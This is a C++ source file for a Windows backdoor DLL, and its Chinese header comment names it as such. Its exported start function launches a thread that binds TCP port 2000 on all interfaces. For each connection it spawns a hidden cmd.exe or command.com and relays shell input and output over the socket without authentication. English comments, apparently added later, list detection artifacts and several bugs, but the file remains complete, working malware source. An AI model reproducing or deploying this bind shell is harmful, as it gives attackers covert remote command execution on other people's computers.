?? mydll.cpp
/*
后門DLL,開兩個線程一個返回另一個實現
綁定cmd.exe或command.com功能 tcp 2000
*/
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include <winnt.h>
// Entry point a host calls to start the worker; it only creates a thread and
// returns (how this symbol is exported from the DLL is not visible in this file).
VOID FAR PASCAL Mbegin();
// Thread id of the worker created in Mbegin(); written there, never read here.
DWORD MyThreadId1;
// Worker thread body. Declared with a `char` parameter and VOID return, which does
// not match LPTHREAD_START_ROUTINE (DWORD WINAPI fn(LPVOID)); the cast in Mbegin()
// suppresses that mismatch. The parameter is never used by the body.
static VOID MyThreadFn1(char Parameter);
/*
 * Start the backdoor's worker thread and return immediately, so the caller
 * (presumably the process that loaded this DLL) is never blocked.
 *
 * Detection note: from the host's point of view this is a single CreateThread
 * whose start address is MyThreadFn1; everything observable (the TCP/2000
 * listener, the hidden shell) happens on that thread.
 */
VOID FAR PASCAL Mbegin()
{
// Thread security attributes: inheritable handle, default (NULL) descriptor.
SECURITY_ATTRIBUTES mthread1;
mthread1.bInheritHandle=TRUE;
mthread1.lpSecurityDescriptor=NULL;
mthread1.nLength=sizeof(SECURITY_ATTRIBUTES);
// Default stack size, run immediately (flags 0), no argument (NULL).
// The returned thread handle is discarded; only the id is kept, in MyThreadId1.
CreateThread(&mthread1,0,
(LPTHREAD_START_ROUTINE) MyThreadFn1,
NULL,0,&MyThreadId1);
return;
}
/*
 * Worker thread: a bind shell. Listens on TCP port 2000 on all interfaces and,
 * for each accepted connection, spawns a hidden cmd.exe (NT family) or
 * command.com (Windows 9x family) with stdin/stdout/stderr redirected through
 * two anonymous pipes, then relays bytes between the socket and the pipes in
 * clear text. The `host` parameter is never used.
 *
 * Observable artifacts for detection / incident response:
 *  - a listening socket on TCP/2000 owned by the process hosting this code;
 *  - that process creating cmd.exe / command.com with a hidden window
 *    (SW_HIDE) and inherited pipe handles as standard handles;
 *  - shell input and output crossing the network unencrypted.
 * The spawned shell is never terminated here and its process/thread handles
 * in ProcessInformation are never closed, so a shell may keep running after
 * the client disconnects. The listening socket is never closed either.
 */
static VOID MyThreadFn1(char host)
{
fd_set fdsr;
// Single carriage return, appended to each command only for command.com (ver==0).
char enter[]={0x0d};
// 1 = NT-family (cmd.exe), 0 = 9x-family (command.com), -1 = not yet decided.
int ver=-1;
// select() timeout of 50 microseconds: the relay loop is effectively a busy poll.
TIMEVAL tm;
tm.tv_sec=0;
tm.tv_usec=50;
// Get the OS version to choose the shell binary.
DWORD dwVersion = GetVersion();
char *cmdLine;
// Major/minor version are extracted but never used afterwards.
DWORD dwWindowsMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
DWORD dwWindowsMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));
// GetVersion() sets the high bit on Windows 95/98/Me; clear high bit means NT family.
if (dwVersion < 0x80000000)
{
ver=1;
cmdLine= "cmd.exe";
}
else
{
ver=0;
cmdLine= "command.com";
}
// Shared 4 KiB buffer for both directions of the relay.
char Buff[4096];
int ret;
WSADATA WSAData;
// (1<<8)|1 == 0x0101: requests Winsock 1.1. Result not checked.
WSAStartup((WORD)((1<<8)|1),(LPWSADATA) &WSAData);
SOCKET listenFD,clientFD;
SECURITY_ATTRIBUTES sa;
struct sockaddr_in server;
int iAddrSize = sizeof(server);
// Pipe 1: shell stdout/stderr -> this thread. Pipe 2: this thread -> shell stdin.
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
STARTUPINFO si;
PROCESS_INFORMATION ProcessInformation;
unsigned long lBytesRead;
DWORD dwLen;
listenFD = socket(AF_INET,SOCK_STREAM,0);
// This socket is immediately overwritten by accept() below and never closed.
clientFD = socket(AF_INET,SOCK_STREAM,0);
// Bind 0.0.0.0:2000 — reachable from every interface.
server.sin_family = AF_INET;
server.sin_port = htons(2000);
server.sin_addr.s_addr=INADDR_ANY;
// Pipe handles are created inheritable so the child shell receives them.
// nLength is hard-coded to 12 rather than sizeof(SECURITY_ATTRIBUTES).
sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true;
// bind/listen results are stored in ret but never examined.
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
// Accept a connection; control returns here after every session ends.
begin:
clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
if(clientFD==INVALID_SOCKET)
ExitThread(0);
// Two anonymous pipes per session, default buffer size.
ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
memset(&si,0,sizeof(STARTUPINFO));
// Execute cmdLine with redirected standard handles and a hidden window.
GetStartupInfo(&si);
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW ;
si.wShowWindow=SW_HIDE;
si.hStdError=hWritePipe1;
si.hStdInput=hReadPipe2;
si.hStdOutput=hWritePipe1;
// bInheritHandles=1: the child gets all four pipe handles, not just the three it uses.
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
if(ret==0)
{
// Shell failed to start: release this session's pipes and socket, end the thread.
CloseHandle(hWritePipe2);
CloseHandle(hReadPipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe1);
closesocket(clientFD);
ExitThread(0);
}
// Handle commands: relay socket -> shell stdin, then shell stdout -> socket.
Sleep(200);
while(1) {
memset(Buff,0,4096);
FD_ZERO(&fdsr);
FD_SET(clientFD,&fdsr);
// Winsock ignores the first (nfds) argument, hence NULL here.
ret=select(NULL, &fdsr, NULL, NULL, &tm);
if ( ret!= 0&&ret!=SOCKET_ERROR)
{
if (FD_ISSET(clientFD,&fdsr))
lBytesRead=recv(clientFD,Buff,4096,0);
if(lBytesRead<=0)
goto end;
// Forward the received bytes to the shell's stdin.
ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
if(!ret)
goto end;
// command.com additionally needs a CR to execute the line.
if(ver==0)
ret=WriteFile(hWritePipe2,enter,1,&lBytesRead,0);
if(!ret)
goto end;
}
memset(Buff,0,4096);
// Non-blocking check for pending shell output; dwLen gets the byte count available.
PeekNamedPipe(hReadPipe1,NULL,0,NULL,&dwLen,NULL);
if(dwLen>0)
{
// dwLen is read into a 4096-byte buffer without being clamped to its size.
ret=ReadFile(hReadPipe1,Buff,dwLen,&lBytesRead,0);
if(!ret)
goto end;
ret=send(clientFD,Buff,dwLen,0);
if(ret<=0)
goto end;
}
}
// Session teardown: close this thread's pipe ends and the client socket, then
// wait a second and go back to accept(). The shell process itself is left running.
end:
CloseHandle(hWritePipe2);
CloseHandle(hReadPipe1);
CloseHandle(hReadPipe2);
CloseHandle(hWritePipe1);
closesocket(clientFD);
Sleep(1000);
goto begin;
// Unreachable: the goto above always transfers control back to begin.
ExitThread(0);
}